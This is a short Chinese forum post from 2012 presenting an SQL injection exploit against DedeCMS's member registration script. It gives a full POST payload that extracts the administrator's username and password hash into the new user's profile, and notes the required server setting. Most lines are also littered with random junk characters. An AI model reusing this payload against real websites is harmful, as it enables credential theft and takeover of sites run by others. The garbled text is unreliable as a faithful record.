dedecms版本 201211229 W* H {4 r- o p, Y) Y
6 t0 Q% B# F' N/ h# k' r( X
需要magic_quotes_gpc=Off
}: \7 d p" m: v
6 |1 A3 X# H8 k! A f# T( g应该是没有什么大危害的漏洞.8 w" s; J7 j% y. [2 j$ `$ o, i
原来发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.$ h' }9 y' @' P. l4 u4 o
( g1 q# ^" Y' R9 w+ P
是一个漏洞.其实不仅仅是审核机制绕过,也可以获得管理员密码的.
( N) W/ s, M1 e3 _+ A( S5 @POST提交以下数据,其实不用POST提交的,这样隐蔽点.3 L8 ?2 x3 _9 Q7 I3 ] `# u( m
6 `# I( c, A1 Ghttp:///de/member/reg_new.php7 J) [8 F: J3 f3 q1 {* R, V
. o6 m5 w8 X: u+ @3 | D( k9 f
POST
' e0 K0 G5 C! b0 b
5 A8 k, h; i3 t2 s cdopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&userid=c4rp3nt3r&uname=c4rp3nt3r&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,(select concat(userid,0x3a,pwd) from `#@__admin` limit 1),0,'',1316751900,'',1316751900,'');%00&vdcode=glos&agree=
9 u9 \) [3 y' E6 Y; S6 H
3 f; q" v8 A& @# a( M @0 o成功注册后,头像处里面有好玩的信息.7 J+ O/ p! W0 `
. D) K2 U8 J% U* O7 a u
|
发表于 2012-12-5 10:03:32
收藏
支持
反对